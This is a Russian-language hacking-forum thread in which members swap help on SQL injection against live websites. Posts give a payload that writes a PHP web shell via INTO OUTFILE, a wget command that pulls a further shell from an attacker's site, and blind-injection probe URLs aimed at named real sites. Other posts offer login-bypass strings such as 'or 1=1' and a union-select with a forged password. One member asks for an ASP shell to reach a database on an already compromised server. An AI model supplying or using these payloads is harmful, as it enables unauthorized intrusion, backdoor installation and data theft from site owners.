Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает :confused: , хто может обьяснить или где я могу почитать?
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://forum.antichat.ru/threadnav119047-1-10.html
     
    _________________________
  3. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    135
    Likes Received:
    41
    Reputations:
    26
    всем ку)
    http://www.uralremstroy.ru/catalog.php?group_id=104
    с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?
    Заранее спасибо.
     
  4. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:
    PHP:
    SELECT '<?php eval($_GET[e]);?>' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;
     
  5. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    select '<?php system($_GET['q'])?>' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php
    -O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).

    upd. "e" - двойные кавычки, чот форум одинарные ставит.
    upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.
     
    #18105 Melfis, 24 Oct 2011
    Last edited: 24 Oct 2011
  6. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    '<?php system($_GET['q'])?>'
    
    Ошибка же.
    Вот так правильно будет:
    Code:
    '<?php system($_GET["q"])?>'
    или вообще без кавычек
    '<?php system($_GET[q])?>'
    
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    чёт я там не нашол нигде ответа
     
  8. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    перепутал с q -__-
     
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    http://www.xakep.ru/post/52222/
     
  10. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    А там есть вообще sql inj?

    http://wifi.hm-ugratel.ru/?m[admin]&id=123
    http://wifi.hm-ugratel.ru/?m[admin]&id=abc
    http://wifi.hm-ugratel.ru/?m[admin]&id=123'
    http://wifi.hm-ugratel.ru/?m[admin]&id=abc'

    Разницу чувствуешь? я - нет. Если и есть, то жесть какая слепая.
     
  11. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Там 4-ветка, и только блинд
    http://www.uralremstroy.ru/catalog.php?group_id=14)+and+substring(version(),1,1)=4--+
     
  12. cetlainform

    cetlainform New Member

    Joined:
    31 Aug 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    при сканирование сайта Acunetix Web Vulnerability Scanner 7 есть опасная уезвимость <Limit GET>
    require valid-user
    </Limit>
    как я понял это уязвимость связана с http и https при постановки https в нужный запрос получаем сертификат безопасности
    как эту уязвимость реализовать?
     
  13. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Не получается раскрутить скуль, при авторизации:

    При запросе, т.е. логине
    , выскакивает ошибка:



    При asd' or 1=1--
    Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.
    Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает :(
     
  14. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Действующий ник, например admin' or 1='1
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:

    asd' union select 'pass', 'salt', 1, '1

    логин указываешь asd
    пасс pass
     
  16. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Есть данные для подключения к MSSQL серверу и шелл на серваке, никак не могу подкконектиться к базе, через php не хочет, как я понял нужен asp шелл с поддержкой mssql. поделитесь ктонибудь?
     
  17. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    154
    Likes Received:
    18
    Reputations:
    9
    http://www.plus2net.com/asp-tutorial/db-mssqlconn.php

    попробуй из этого сделать простенький шелл ;)
     
  18. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    При таком запросе ошибки от мускуля нет, но в ответ я получаю, что пароль не верный.
     
  19. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    1' or 1=1 #
    И MySQL отдаст всех юзеров, где соблюдается условие 1=1. А соблюдается оно везде.
    1' OR 1=1 LIMIT 1 #
    Думаю так должно сработать.
     
  20. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0

    Тоже, ошибки нет, но пишет что не правильный пароль.
    Если что, могу кому-то в пм кинуть
     
Loading...
Thread Status:
Not open for further replies.